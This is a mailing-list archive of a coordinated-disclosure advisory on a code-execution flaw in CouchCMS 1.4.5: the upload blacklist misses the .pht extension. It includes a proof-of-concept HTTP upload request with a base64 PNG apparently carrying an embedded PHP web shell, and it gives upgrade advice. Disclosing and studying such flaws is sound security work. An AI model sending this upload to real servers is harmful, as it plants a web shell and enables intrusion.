| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 23 Dec 2015 11:52:25 +0100 From: "Curesec Research Team (CRT)" <crt@...esec.com> To: fulldisclosure@...lists.org Subject: [FD] CouchCMS 1.4.5: Code Execution Security Advisory - Curesec Research Team 1. Introduction Affected Product: CouchCMS 1.4.5 Fixed in: 1.4.7 Fixed Version Link: http://www.couchcms.com/products/ Vendor Website: http://www.couchcms.com/ Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 11/17/2015 Disclosed to public: 12/21/2015 Release mode: Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS High 8.5 AV:N/AC:M/Au:S/C:C/I:C/A:C Description When uploading a file, the file extension is checked against a blacklist. This blacklist misses at the least pht, which is executed by most default Apache configurations. The uploaded file must be a valid image file, but an attacker can bypass this restriction. Admin credentials are required to upload files. A htaccess file forbids the execution of PHP code in uploaded files, but some servers are configured to not read htaccess files, for example for performance reasons. Apache for example ignores htaccess files by default since version 2.3.9. 3. Proof of Concept POST /CouchCMS-1.4.5/couch/includes/kcfinder/browse.php?type=image&lng=en&act=upload&nonce=1abb096565d868f94f727f600e8c4f61 HTTP/1.1 Host: localhost Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------18851501621445926637695954351 Content-Length: 529 -----------------------------18851501621445926637695954351 Content-Disposition: form-data; name="upload[]"; filename="imageshell.pht" Content-Type: application/octet-stream [base64: iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAIAAAD8GO2jAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAYElEQVRIiWNcPD89JF9HRVRbMF0oJF9QT1NUWzFdKTs/PliAgYHBc143k/yPi9t+X9N9qif38ePJv1/vBnyyMDBj2bln/dk9G84yjIJRMApGwSgYBaNgFIyCUTAKhg0AAIGyGwIHeA0MAAAAAElFTkSuQmCC] The shellcode used can be found here: https://www.idontplaydarts.com/2012/06/ encoding-web-shells-in-png-idat-chunks/ 4. Solution To mitigate this issue please upgrade at least to version 1.4.7: http://www.couchcms.com/products/ Please note that a newer version might already be available. 5. Report Timeline 11/17/2015 Informed Vendor about Issue 11/18/2015 Vendor sends fixes for confirmation 11/20/2015 Verified fixes 11/24/2015 Vendor releases fix 12/21/2015 Disclosed to public Blog Reference: https://blog.curesec.com/article/blog/CouchCMS-145-Code-Execution-125.html -- blog: https://blog.curesec.com tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Romain-Rolland-Str 14-24 13089 Berlin, Germany _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists